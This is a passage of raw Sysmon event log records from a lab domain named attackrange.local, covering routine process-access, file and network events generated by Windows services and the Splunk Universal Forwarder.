07:53:28.256{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807817Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:28.256{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807816Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:28.256{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807815Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:28.256{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807814Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:28.256{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F4F8-60EB-8079-00000000D001}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807813Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:28.256{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807812Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:28.256{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807811Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:28.256{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F4F8-60EB-8079-00000000D001}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807810Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:28.241{0C1E0330-F4F8-60EB-8079-00000000D001}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807827Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:29.990{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF40D7B6A036DBA52DCA51B367A88FFA,SHA256=B5619B4531021664CA14E83A1E6607AB691335BB5FFE69387E21BF2880A15AEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049311Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:29.795{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF6A7A0CDD11F4A00C7B7310DB594CEF,SHA256=F9D6EECE334858C59516E929532ED037CACF489B2DB4C4166CAC1B2409FECAEA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807826Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:29.319{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D4BE4E81581C1BDA861B731906A098BD,SHA256=BF025D1AC98817D9331245637430081F7AF839932139E4482F608E6A649A9B31,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049310Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:29.495{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0EEEE864BF3E251A4C7EE1FF5B035DB9,SHA256=6982675ACB408A9A8819C0AFC82D8B192159777C8B7196080A398A058D8CDB60,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049309Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:29.495{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D6123476FFB00E492FF4D282FFA90B55,SHA256=1F8C1CB549747708BA7AD0656BA705E7E56A8429EAE58E52778FE304256FFE9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049312Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:30.809{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=492FF4477D791BDE154FBAF473C1828D,SHA256=CA7BBC545E3E779EF57AD70EABBD5F6E3D9E72C5A0C7FF7312BC47495297EB66,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807828Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:30.100{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=B91964A22433510F69D412F2E01CB290,SHA256=C305DDDE0A3AFD20791958CC5FE4EEAE1EE4AF8D093298BBFE936C1F1775EB82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049314Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:31.828{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A127B6582C6544DEBE5822E1A477E13,SHA256=94025E8F0E5D5239EB9E04DDC21DC205A95D9E80D021352B5B105ABF184A6ECA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807830Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:30.295{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57281-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807829Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:31.037{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE57AEF71277F9CCAD2730F48C36054E,SHA256=D2EA02DCE5B34DD6F8F70177DEF8B2D602872DB1F80B46F295CCE6F71CACF91E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049313Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:23.705{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51041-false10.0.1.12-8000- 23542300x80000000000000001049315Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:32.846{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB3EC74EBC7C15ED0E186AE4E5CCA550,SHA256=2AE883EEB6E12F3E01D75DCE82BD781C51C911B099407A5654394FD9591662F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807831Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:32.053{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B933906133169AFE2DCEF5CEA8A27BDE,SHA256=68548914DE526CF72DC83EDCFC26D274ECD4DFD26DC14F0C93AD0C1A2118C897,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049316Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:33.861{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB3C8F67774A0820C556886331A4697D,SHA256=E93DEC46456D86733C5FB809EECE95A6F5BFBDD7674DDCA615B23A85291A4E19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807832Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:33.084{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A747E818EBF45422847C36324B4ECB6C,SHA256=7A7CD254F475C54C8C9A26F36DFFED1B35060A1F2799808F1FBEB07F3B1D00E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049317Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:34.864{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DDDCD7614B3A0B0A7B03FA04C0406D7,SHA256=6559DEC7CC7AB60961E8ABA4DA54C189F8AF95C49F6CE09A84A652E32312671D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807833Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:34.100{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2933270C92C24A0D021193101D8C7A4,SHA256=43F4699B59252A857535ABDC7CA675C52575D7909992B6E1C11B55E41FC297DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049318Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:35.864{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2088830FCF4BB5DBCF310371ABCF423,SHA256=80F8BCFAAE9CAF1826EF6D0520043D475E8EE3E706A4F448E4134497087B234D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807834Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:35.136{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72D774EF78E03C8009A92EF6692615EC,SHA256=A40C5EBBDF8CF1D7448A637D9498C5D6202A588DD60148D08CEA3E995AB68059,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049320Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:36.879{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCCA72CEBD7E0590D331A347A618DF81,SHA256=2FF678A4107CFB1420A8AC134A915FD5E33F5960300EA230159E5E2902BC0391,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807836Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:35.315{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57282-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807835Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:36.151{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F21A5841F4D298A716694F135423313,SHA256=4ADE88176E9662D49CC559C5EE1FF693C710ED122160A6FDEDBAB502FC916D9A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049319Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:28.757{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51042-false10.0.1.12-8000- 23542300x80000000000000001049321Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:37.879{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A46D71CF3E7E438B4E689D3E8E1B2C83,SHA256=5321D48E6DAA773A301C625A233DBD16FAC52A3E77274E00A543871CD151902D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807837Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:37.151{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=732748237F7D1FCD8E287B20F68F3B51,SHA256=B3B0DC9DB24F124078AC20CFA5CE0FA912147E77C244EDB405FFD462E4E71858,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049323Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:38.880{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02A7DD1D8ADE258FE2474CFA835624F6,SHA256=7900EC429BE5FF3A099437D0C71352ACB7512653B4EF0975665C0B666DF2C815,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807838Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:38.198{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C4567DAD3B9A6DF5D7D609596156D17,SHA256=0701F43EAA03C02CF9FBFD2C8D6C2649FD40C86A2E931CF92AFE24D189FB5863,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049322Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:38.547{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=9667158C1C3B9B0888C6C6AD33DE050B,SHA256=0BFFDC06D765BC74B5DDC3E036AED172FF115077AF65BA0444B81F54F871C604,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049324Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:39.880{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B32BB1525BEF83FC5E41ADAEDC91DB64,SHA256=AD62B9A1BCA3736FB3F480BF1259FE6A071949ECB702A5C5B40DAC0B0D77A306,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807839Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:39.245{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=573FA6A2C88C6DD624F543D1AABF10DF,SHA256=00F6C20DB83FFD6EC81024639A8BD5491DC1EB06D71F5F81BF3E298D009202C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049325Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:40.895{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06616A065CF5E7AD61C1544F6EEB3CA7,SHA256=BCDF998796D051095439723F31FB86D89BC950938875F9CE63C29E04E3E1DCA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807840Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:40.292{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A2E33DDEF4FA7B48B9EF2CC7DB6ECC0,SHA256=F56CB686F19B1C5BD92DB8AE565F6FA64A426A4B2AECCA62C3F70A78F52817C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049329Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:53:41.910{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CFEDE3CC30D52F35BDA5E6D170AF4D6,SHA256=8F4764FE570B35BB8971D52053CE8A49C3D7A9B3D9E50DFF94DF334FE477A4F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807841Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:53:41.308{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38338F3A137B4F5B5F947FEFC5FEDBA6,SHA256=1C85A3D6223682C4D4FE21B829B4DA0E59019E4D947937F355C4458BCB4F7207,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049328Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 